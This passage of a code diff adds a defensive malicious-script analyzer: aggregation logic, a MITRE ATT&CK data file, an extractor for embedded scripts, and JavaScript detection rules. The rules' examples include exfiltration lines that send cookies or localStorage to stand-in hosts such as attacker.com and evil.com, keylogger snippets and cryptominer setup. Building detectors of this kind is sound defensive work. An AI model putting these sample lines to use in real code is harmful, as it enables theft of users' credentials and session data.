'script_lines': script_lines, + 'script_bytes': script_bytes, + 'script_size': len(script_content), # Kept for backward compatibility + + # Analysis timing + 'analysis_time_seconds': round(analysis_duration, 3), + 'heuristic_duration': round(heuristic_duration, 3), + 'obfuscation_duration': round(obfuscation_duration, 3), + 'ioc_duration': round(ioc_duration, 3), + 'mitre_duration': round(mitre_duration, 3), + 'llm_duration': round(llm_duration, 3), + 'verdict_duration': round(verdict_duration, 3), + + # Finding counts + 'total_findings': len(all_findings), + 'heuristic_findings_count': len(heuristic_findings), + 'obfuscation_findings_count': len(obfuscation_findings), + 'llm_findings_count': len(llm_findings), + + # IOC counts + 'total_iocs': total_iocs, + 'ioc_types_found': len(iocs), + 'iocs_by_type': {ioc_type: len(ioc_list) for ioc_type, ioc_list in iocs.items()}, + + # MITRE ATT&CK counts + 'total_mitre_techniques': len(mitre_techniques), + 'mitre_techniques_by_tactic': self._group_techniques_by_tactic(mitre_techniques), + + # Pattern matching info + 'patterns_checked': self.heuristic_engine.registry.get_enabled_count(), + 'pattern_matches': severity_dist, + + # Analysis mode + 'paranoia_level': paranoia_level, + 'obfuscation_detected': obfuscation_detected, + 'llm_available': llm_available, + 'llm_error': llm_error, + 'parser_fallback_mode': fallback_mode, + 'parse_error': parse_error if fallback_mode else None, + 'llm_fallback_mode': include_llm and not llm_available + } + ) + + logger.info(f"Analysis complete: {verdict.value} (confidence: {confidence:.2f}, " + f"time: {analysis_duration:.2f}s)") + return result, None + + except Exception as e: + error_msg = f"Analysis failed: {str(e)}" + logger.error(error_msg, exc_info=True) + return None, error_msg + + def _analyze_embedded( + self, + content: str, + file_type: str, + include_llm: bool, + paranoia_level: int, + llm_model: str = 'flash' + ) -> tuple[Optional[AnalysisResult], Optional[str]]: + """ + Analyzes embedded scripts in HTML, XML, or SCT files. + + Args: + content: Container file content. + file_type: Type of container ('html', 'xml', 'sct'). + include_llm: Whether to include LLM semantic analysis. + paranoia_level: Analysis sensitivity level. + + Returns: + Tuple of (AnalysisResult, error_message). + """ + logger.info(f"Analyzing embedded scripts in {file_type} file") + + # Extract scripts from container + extracted_scripts = self.script_extractor.extract(content, file_type) + + if not extracted_scripts: + return None, f"No scripts found in {file_type} file" + + logger.info(f"Extracted {len(extracted_scripts)} script(s) from {file_type} file") + + # Analyze each extracted script + all_findings = [] + all_heuristic_findings = [] + all_llm_findings = [] + all_iocs = {} + all_mitre_techniques = {} + + highest_verdict = Verdict.BENIGN + total_confidence = 0.0 + analysis_errors = [] + + for i, script in enumerate(extracted_scripts, 1): + logger.info(f"Analyzing script {i}/{len(extracted_scripts)}: " + f"{script.language} (lines {script.line_start}-{script.line_end})") + + # Analyze the extracted script + result, error = self.analyze( + script.content, + script.language, + include_llm=include_llm, + paranoia_level=paranoia_level, + llm_model=llm_model + ) + + if error: + logger.warning(f"Failed to analyze script {i}: {error}") + analysis_errors.append(f"Script {i} ({script.context}): {error}") + continue + + if not result: + continue + + # Adjust finding line numbers to match original file + for finding in result.findings: + if hasattr(finding, 'line_number') and finding.line_number: + finding.line_number += script.line_start - 1 + # Add context about which embedded script this came from + finding.description = f"[{script.context}] {finding.description}" + + # Aggregate results + all_findings.extend(result.findings) + all_heuristic_findings.extend(result.heuristic_findings) + all_llm_findings.extend(result.llm_findings) + + # Merge IOCs + for ioc_type, ioc_list in result.iocs.items(): + if ioc_type not in all_iocs: + all_iocs[ioc_type] = [] + all_iocs[ioc_type].extend(ioc_list) + + # Merge MITRE techniques + all_mitre_techniques.update(result.mitre_techniques) + + # Track highest severity verdict + if result.verdict.value > highest_verdict.value: + highest_verdict = result.verdict + + total_confidence += result.confidence_score + + # If all scripts failed to analyze, return error + if not all_findings and analysis_errors: + return None, f"Failed to analyze embedded scripts: {'; '.join(analysis_errors)}" + + # Calculate aggregate confidence (average of all scripts) + num_analyzed = len(extracted_scripts) - len(analysis_errors) + aggregate_confidence = total_confidence / num_analyzed if num_analyzed > 0 else 0.0 + + # Use the highest verdict found across all scripts + final_verdict = highest_verdict + + # Get severity distribution + from .verdict import get_severity_distribution + severity_dist = get_severity_distribution(all_findings) + + # Create aggregate result + result = AnalysisResult( + verdict=final_verdict, + confidence_score=aggregate_confidence, + findings=all_findings, + heuristic_findings=all_heuristic_findings, + llm_findings=all_llm_findings, + iocs=all_iocs, + mitre_techniques=all_mitre_techniques, + metadata={ + 'file_type': file_type, + 'embedded_scripts_count': len(extracted_scripts), + 'scripts_analyzed': num_analyzed, + 'scripts_failed': len(analysis_errors), + 'analysis_errors': analysis_errors, + 'total_findings': len(all_findings), + 'heuristic_findings_count': len(all_heuristic_findings), + 'llm_findings_count': len(all_llm_findings), + 'total_iocs': sum(len(ioc_list) for ioc_list in all_iocs.values()), + 'total_mitre_techniques': len(all_mitre_techniques), + 'pattern_matches': severity_dist, + 'paranoia_level': paranoia_level, + 'embedded_analysis': True + } + ) + + logger.info(f"Embedded script analysis complete: {final_verdict.value} " + f"(confidence: {aggregate_confidence:.2f}, " + f"{num_analyzed}/{len(extracted_scripts)} scripts analyzed)") + + return result, None + + def _group_techniques_by_tactic(self, mitre_techniques: dict) -> Dict[str, int]: + """ + Groups MITRE techniques by tactic for metadata. + + Args: + mitre_techniques: Dictionary of MITRETechnique objects. + + Returns: + Dictionary mapping tactic names to technique counts. + """ + tactic_counts = {} + for technique in mitre_techniques.values(): + tactic = technique.tactic + tactic_counts[tactic] = tactic_counts.get(tactic, 0) + 1 + return tactic_counts + + def get_statistics(self) -> Dict[str, Any]: + """ + Returns statistics about the analyzer. + + Returns: + Dictionary with analyzer statistics. + """ + stats = { + 'patterns_loaded': self.patterns_loaded, + 'heuristic_engine': self.heuristic_engine.get_statistics() + } + return stats + + +# Convenience function for one-off analysis +def analyze_script( + script_content: str, + language: str, + patterns_dir: Optional[str | Path] = None +) -> tuple[Optional[AnalysisResult], Optional[str]]: + """ + Convenience function to analyze a script without managing analyzer instance. + + Creates a ScriptAnalyzer, loads patterns, and performs analysis. + For repeated use, create an analyzer instance and reuse it. + + Args: + script_content: The script content to analyze. + language: Script language ('powershell', 'bash', 'javascript'). + patterns_dir: Directory containing patterns (default: auto-detect). + + Returns: + Tuple of (AnalysisResult, error_message). + + Examples: + >>> result, error = analyze_script(script_content, 'powershell') + >>> if result: + ... print(f"Verdict: {result.verdict.value}") + """ + # Auto-detect patterns directory if not provided + if patterns_dir is None: + current_file = Path(__file__) + patterns_dir = current_file.parent / 'patterns' + + analyzer = ScriptAnalyzer(patterns_dir) + return analyzer.analyze(script_content, language) diff --git a/docker/script-sentinel/sentinel/data/mitre_attack.json b/docker/script-sentinel/sentinel/data/mitre_attack.json new file mode 100644 index 0000000000000..eab40d1a79c10 --- /dev/null +++ b/docker/script-sentinel/sentinel/data/mitre_attack.json @@ -0,0 +1,150 @@ +{ + "name": "Enterprise ATT&CK", + "version": "14.1", + "techniques": { + "T1059": { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "tactic": [ + "Execution" + ], + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.", + "url": "https://attack.mitre.org/techniques/T1059/" + }, + "T1059.001": { + "id": "T1059.001", + "name": "PowerShell", + "tactic": [ + "Execution" + ], + "description": "Adversaries may abuse PowerShell commands and scripts for execution.", + "url": "https://attack.mitre.org/techniques/T1059/001/", + "parent": "T1059" + }, + "T1059.004": { + "id": "T1059.004", + "name": "Unix Shell", + "tactic": [ + "Execution" + ], + "description": "Adversaries may abuse Unix shell commands and scripts for execution.", + "url": "https://attack.mitre.org/techniques/T1059/004/", + "parent": "T1059" + }, + "T1140": { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis.", + "url": "https://attack.mitre.org/techniques/T1140/" + }, + "T1027": { + "id": "T1027", + "name": "Obfuscated Files or Information", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze.", + "url": "https://attack.mitre.org/techniques/T1027/" + }, + "T1071": { + "id": "T1071", + "name": "Application Layer Protocol", + "tactic": [ + "Command and Control" + ], + "description": "Adversaries may communicate using application layer protocols to avoid detection.", + "url": "https://attack.mitre.org/techniques/T1071/" + }, + "T1071.001": { + "id": "T1071.001", + "name": "Web Protocols", + "tactic": [ + "Command and Control" + ], + "description": "Adversaries may communicate using application layer protocols associated with web traffic.", + "url": "https://attack.mitre.org/techniques/T1071/001/", + "parent": "T1071" + }, + "T1105": { + "id": "T1105", + "name": "Ingress Tool Transfer", + "tactic": [ + "Command and Control" + ], + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment.", + "url": "https://attack.mitre.org/techniques/T1105/" + }, + "T1003": { + "id": "T1003", + "name": "OS Credential Dumping", + "tactic": [ + "Credential Access" + ], + "description": "Adversaries may attempt to dump credentials to obtain account login and credential material.", + "url": "https://attack.mitre.org/techniques/T1003/" + }, + "T1003.001": { + "id": "T1003.001", + "name": "LSASS Memory", + "tactic": [ + "Credential Access" + ], + "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).", + "url": "https://attack.mitre.org/techniques/T1003/001/", + "parent": "T1003" + }, + "T1055": { + "id": "T1055", + "name": "Process Injection", + "tactic": [ + "Defense Evasion", + "Privilege Escalation" + ], + "description": "Adversaries may inject code into processes in order to evade process-based defenses.", + "url": "https://attack.mitre.org/techniques/T1055/" + }, + "T1547": { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "tactic": [ + "Persistence", + "Privilege Escalation" + ], + "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon.", + "url": "https://attack.mitre.org/techniques/T1547/" + }, + "T1547.001": { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "tactic": [ + "Persistence", + "Privilege Escalation" + ], + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.", + "url": "https://attack.mitre.org/techniques/T1547/001/", + "parent": "T1547" + }, + "T1562": { + "id": "T1562", + "name": "Impair Defenses", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.", + "url": "https://attack.mitre.org/techniques/T1562/" + }, + "T1562.001": { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.", + "url": "https://attack.mitre.org/techniques/T1562/001/", + "parent": "T1562" + } + } +} \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/extractor.py b/docker/script-sentinel/sentinel/extractor.py new file mode 100644 index 0000000000000..1667d1f6f9d7b --- /dev/null +++ b/docker/script-sentinel/sentinel/extractor.py @@ -0,0 +1,438 @@ +# sentinel/extractor.py + +""" +Script extraction module for embedded scripts in HTML, XML, and SCT files. + +This module detects and extracts scripts embedded in various container formats, +enabling analysis of scripts within HTML pages, XML configurations, and SCT files. +""" + +import re +import logging +from typing import List, Tuple, Optional +from dataclasses import dataclass + +logger = logging.getLogger(__name__) + + +@dataclass +class ExtractedScript: + """ + Represents a script extracted from a container file. + + Attributes: + content: The extracted script content. + language: Detected language ('javascript', 'powershell', 'bash', 'jscript'). + line_start: Starting line number in the original file. + line_end: Ending line number in the original file. + source_type: Type of container ('html', 'xml', 'sct'). + context: Additional context about the extraction (e.g., tag name). + """ + content: str + language: str + line_start: int + line_end: int + source_type: str + context: str = "" + + +class ScriptExtractor: + """ + Extracts embedded scripts from HTML, XML, and SCT files. + + Supports: + - HTML: ', + re.DOTALL | re.IGNORECASE + ) + + # Pattern for CDATA sections + self.cdata_pattern = re.compile( + r'', + re.DOTALL + ) + + # Pattern for SCT script tags with language attribute + self.sct_script_pattern = re.compile( + r']*>(.*?)', + re.DOTALL | re.IGNORECASE + ) + + # Pattern for XML script tags with type attribute + self.xml_script_pattern = re.compile( + r']*>(.*?)', + re.DOTALL | re.IGNORECASE + ) + + def detect_file_type(self, content: str) -> Optional[str]: + """ + Detect the file type based on content. + + Args: + content: File content to analyze. + + Returns: + File type ('html', 'xml', 'sct') or None if unknown. + """ + content_lower = content.lower().strip() + + # Check for SCT (scriptlet) files + if ' List[ExtractedScript]: + """ + Extract JavaScript from HTML '" + - "document.write('')" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml new file mode 100644 index 0000000000000..e41ab9e8b4759 --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml @@ -0,0 +1,32 @@ +# JavaScript Pattern: Code Obfuscation +# Detects common JavaScript obfuscation patterns + +id: JS-003 +name: Obfuscated Code Detection +description: | + Detects common JavaScript obfuscation patterns including excessive use of + escape sequences, hex encoding, unicode escapes, and string concatenation + with array indexing. These techniques are frequently used to hide malicious + code from static analysis tools. +languages: + - javascript +detection_type: regex +detection_logic: '(?:\\x[0-9a-fA-F]{2}.*){5,}|(?:\\u[0-9a-fA-F]{4}.*){5,}|(?:\[\d+\]\s*\+\s*){3,}' +severity: Medium +mitre_technique: T1027 +confidence: 0.75 +category: obfuscation +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-01-15" + references: + - "https://attack.mitre.org/techniques/T1027/" + tags: + - javascript + - obfuscation + - encoding + examples: + - "var x = '\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29'" + - "eval('\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029')" + - "var s = arr[0] + arr[1] + arr[2] + arr[3] + arr[4]" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml new file mode 100644 index 0000000000000..86676ae7dc54e --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: Function Constructor Usage +# Detects use of Function constructor for code execution + +id: JS-004 +name: Function Constructor Code Execution +description: | + Detects use of the Function constructor to create and execute dynamic code. + Similar to eval(), the Function constructor can execute arbitrary JavaScript + from strings, making it a vector for code injection attacks. Attackers use + this to bypass static analysis and execute malicious code. +languages: + - javascript +detection_type: regex +detection_logic: '\bnew\s+Function\s*\(|Function\s*\(\s*["\x27]' +severity: High +mitre_technique: T1059.007 +confidence: 0.85 +category: command_injection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1059/007/" + - "https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function" + tags: + - javascript + - code-execution + - function-constructor + - injection + examples: + - "var fn = new Function('return ' + userInput); fn();" + - "const execute = Function('a', 'b', 'return a + b');" + - "(new Function(maliciousCode))()" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml new file mode 100644 index 0000000000000..61b1edf3587aa --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: document.write() XSS Vector +# Detects use of document.write() with user input + +id: JS-005 +name: document.write() XSS Vector +description: | + Detects use of document.write() which can be exploited for Cross-Site Scripting + (XSS) attacks when used with untrusted input. This method directly writes HTML + to the document and can execute scripts if user-controlled data is included. + Modern security best practices discourage its use. +languages: + - javascript +detection_type: regex +detection_logic: '\bdocument\.write(?:ln)?\s*\(' +severity: Medium +mitre_technique: T1059.007 +confidence: 0.7 +category: injection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1059/007/" + - "https://developer.mozilla.org/en-US/docs/Web/API/Document/write" + tags: + - javascript + - xss + - document-write + - injection + examples: + - "document.write('');" + - "document.writeln(untrustedData);" + - "document.write('');" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml new file mode 100644 index 0000000000000..3a9cc1697080f --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: innerHTML Assignment XSS +# Detects innerHTML assignments that may lead to XSS + +id: JS-006 +name: innerHTML Assignment XSS Risk +description: | + Detects direct assignment to innerHTML property which can lead to Cross-Site + Scripting vulnerabilities when used with untrusted data. Unlike textContent, + innerHTML parses and executes HTML/JavaScript, making it dangerous with + user-controlled input. Attackers exploit this to inject malicious scripts. +languages: + - javascript +detection_type: regex +detection_logic: '\.innerHTML\s*=|\.outerHTML\s*=' +severity: Low +mitre_technique: T1059.007 +confidence: 0.5 +category: injection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1059/007/" + - "https://developer.mozilla.org/en-US/docs/Web/API/Element/innerHTML" + tags: + - javascript + - xss + - innerhtml + - dom-manipulation + examples: + - "element.innerHTML = userInput;" + - "div.innerHTML = '';" + - "document.getElementById('content').outerHTML = maliciousHTML;" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml new file mode 100644 index 0000000000000..7eb9669c38edf --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: WebSocket Data Exfiltration +# Detects WebSocket usage for potential data exfiltration + +id: JS-007 +name: WebSocket Data Exfiltration +description: | + Detects WebSocket connections that may be used for data exfiltration or + command and control communication. While WebSockets are legitimate, attackers + abuse them to bypass traditional HTTP monitoring and exfiltrate data in + real-time. This pattern identifies WebSocket instantiation and send operations. +languages: + - javascript +detection_type: regex +detection_logic: '\bnew\s+WebSocket\s*\(|\.send\s*\(.*(?:document\.|localStorage|sessionStorage|cookie)' +severity: Medium +mitre_technique: T1041 +confidence: 0.7 +category: exfiltration +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1041/" + - "https://developer.mozilla.org/en-US/docs/Web/API/WebSocket" + tags: + - javascript + - websocket + - exfiltration + - c2 + examples: + - "var ws = new WebSocket('wss://attacker.com'); ws.send(document.cookie);" + - "socket.send(JSON.stringify(localStorage));" + - "const ws = new WebSocket('ws://evil.com:8080'); ws.send(sensitiveData);" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml new file mode 100644 index 0000000000000..f01cb62a858d8 --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: Cryptocurrency Mining +# Detects cryptocurrency mining scripts + +id: JS-008 +name: Cryptocurrency Mining Detection +description: | + Detects JavaScript cryptocurrency mining code (cryptojacking). Attackers inject + mining scripts into compromised websites to use visitors' CPU resources for + mining cryptocurrency. This pattern identifies common mining libraries like + CoinHive, Coinhive alternatives, and WebAssembly-based miners. +languages: + - javascript +detection_type: regex +detection_logic: '(?i)(?:coinhive|cryptonight|monero|CoinHive\.Anonymous|new\s+Miner\(|\.start\(\).*miner|authedmine|crypto-loot|webminerpool|(?:new\s+)?Worker.*(?:WebSocket|wss:)|pool.*wss:|mining.*(?:WebSocket|Worker))' +severity: High +mitre_technique: T1496 +confidence: 0.85 +category: impact +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1496/" + - "https://www.malwarebytes.com/cryptojacking" + tags: + - javascript + - cryptomining + - cryptojacking + - resource-hijacking + examples: + - "var miner = new CoinHive.Anonymous('site-key'); miner.start();" + - "new Miner('monero-wallet-address', {throttle: 0.2}).start();" + - "CoinHive.CONFIG.WEBSOCKET_SHARDS = [['wss://ws001.coinhive.com/proxy']];" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml new file mode 100644 index 0000000000000..39387bf316818 --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: Keylogger Detection +# Detects keylogging functionality + +id: JS-009 +name: Keylogger Detection +description: | + Detects JavaScript keylogger implementations that capture user keystrokes. + Attackers use keyloggers to steal passwords, credit card numbers, and other + sensitive information entered by users. This pattern identifies event listeners + for keyboard events combined with data collection or transmission. +languages: + - javascript +detection_type: regex +detection_logic: '(?:addEventListener\s*\(\s*["\x27]key(?:down|up|press)|onkey(?:down|up|press)\s*=).*(?:\.key|\.keyCode|\.which)' +severity: High +mitre_technique: T1056.001 +confidence: 0.8 +category: collection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1056/001/" + - "https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent" + tags: + - javascript + - keylogger + - credential-theft + - input-capture + examples: + - "document.addEventListener('keydown', function(e) { sendToServer(e.key); });" + - "window.onkeypress = function(e) { log += e.key; };" + - "document.onkeydown = (e) => { fetch('/log?key=' + e.keyCode); };" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml new file mode 100644 index 0000000000000..daaed698eb16c --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: localStorage/sessionStorage Theft +# Detects theft of browser storage data + +id: JS-010 +name: Browser Storage Data Theft +description: | + Detects attempts to access and exfiltrate data from localStorage or sessionStorage. + Attackers target browser storage to steal authentication tokens, session data, + and other sensitive information. This pattern identifies bulk storage access + combined with network transmission or suspicious iteration patterns. +languages: + - javascript +detection_type: regex +detection_logic: '(?:localStorage|sessionStorage)(?:\.getItem|\.key\(|\[).*(?:fetch|XMLHttpRequest|\.send\(|navigator\.sendBeacon)' +severity: Medium +mitre_technique: T1539 +confidence: 0.75 +category: credential_access +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1539/" + - "https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage" + tags: + - javascript + - localstorage + - data-theft + - session-hijacking + examples: + - "fetch('http://attacker.com/collect', {method: 'POST', body: JSON.stringify(localStorage)});" + - "for(let i=0; i